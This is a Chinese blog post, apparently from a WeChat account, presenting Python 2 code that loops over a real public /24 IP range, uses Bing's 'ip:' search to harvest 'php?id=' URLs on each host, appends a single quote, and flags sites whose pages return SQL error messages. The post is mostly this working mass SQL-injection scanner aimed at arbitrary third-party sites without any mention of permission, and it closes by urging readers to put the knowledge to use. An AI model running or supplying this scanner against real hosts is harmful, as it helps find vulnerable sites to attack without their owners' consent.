欢迎光临
我们一直在努力

使用python快速扫描C段有注入漏洞的网站

序言


知识是唯一的善,无知则是首恶。
好好的使用知识,让我们一起来摸摸改变。
关注杂术馆,让小编陪你一起学习,一起进步。

实现原理

1 搜索引擎bing的使用


ip:127.0.0.1 php?id=2

0?wx_fmt=png 使用python快速扫描C段有注入漏洞的网站

2 然后根据抓出来的连接,后面直接添加单引号来实现sql注入的检测

0?wx_fmt=png 使用python快速扫描C段有注入漏洞的网站

实现方法

1 首先要实现一个c段的扫描,我们得先写一个for循环所有c段的ip,方法很简单,实现也很简单


def Csubnet():
 ? ?try:
 ? ? ? ?for l in range(10, 255):# ?直接一个for循环搞定
 ? ? ? ? ? ?WebsiteIp('116.251.204.'+str(l))#这个是扫描一个ip的方法
 ? ? ? ? ? ?print "Scaning 129.xxx.93." + str(l)
 ? ?except:
 ? ? ? ?print "C subnets false"

2 如何快速的扫描一个ip是否有漏洞呢,其实很简单。我们采用bing来帮忙,具体的搜索语法如下:


ip:127.0.0.1 php?id=2

实现的方式也很简单


def WebsiteIp(str):
 ? ?try:
 ? ? ? ?# print 'Website collecting'
 ? ? ? ?con = urllib.urlopen(
 ? ? ? ? ? ?'http://www.bing.com/search?q=ip%3A'+str+'%22php%3Fid%3D%22&go=%E6%90%9C%E7%B4%A2&qs=bs&form=QBRE&filt=all')
 ? ? ? ?readd = con.read()
 ? ? ? ?# print readd
 ? ? ? ?find = re.findall('<h2><a href="(.*?)"', readd)
 ? ? ? ?for lins in find:
 ? ? ? ? ? ?print str + '||' + lins
 ? ? ? ? ? ?try:
 ? ? ? ? ? ? ? ?if lins.__contains__('?'):
 ? ? ? ? ? ? ? ? ? ?sqlinjections(lins)

 ? ? ? ? ? ?except:
 ? ? ? ? ? ? ? ?print lins + '||--errors'
 ? ?except:
 ? ? ? ?print 'websiteip false'

3 检测一个连接是不是有漏洞,直接在连接的后面添加单引号,寻找报错的语句。文章源码,回复“scan”可下载


def sqlinjections(str):
 ? ?try:
 ? ? ? ?rez = str + "'"
 ? ? ? ?tstf = urllib.urlopen(rez)
 ? ? ? ?tstdd = tstf.read()
 ? ? ? ?tstfind = re.findall(
 ? ? ? ? ? ?'/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i|You have an error in your SQL syntax|Microsoft VBScript runtime error',
 ? ? ? ? ? ?tstdd)
 ? ? ? ?if (tstfind):
 ? ? ? ? ? ?print "SQLI+++" + str
 ? ? ? ?else:
 ? ? ? ? ? ?print "NOSQLI"+str
 ? ? ? ? ? ?return
 ? ?except:
 ? ? ? ?print 'errors'

4 ? 实现整体效果图
0?wx_fmt=png 使用python快速扫描C段有注入漏洞的网站

总结
不管学习了多少编程知识,也不管你学习了多少渗透测试知识。那么,从此刻起,让我们真正的去学会使用自己掌握的知识。利用知识来解决我们生活中遇到的各种问题。文章涉及到的源码,回复“scan”可以下载。

喜欢我们就请长按下面的图片关注我们吧。

0?wx_fmt=png 使用python快速扫描C段有注入漏洞的网站

未经允许不得转载:杂术馆 » 使用python快速扫描C段有注入漏洞的网站
分享到: 更多 (0)

评论 抢沙发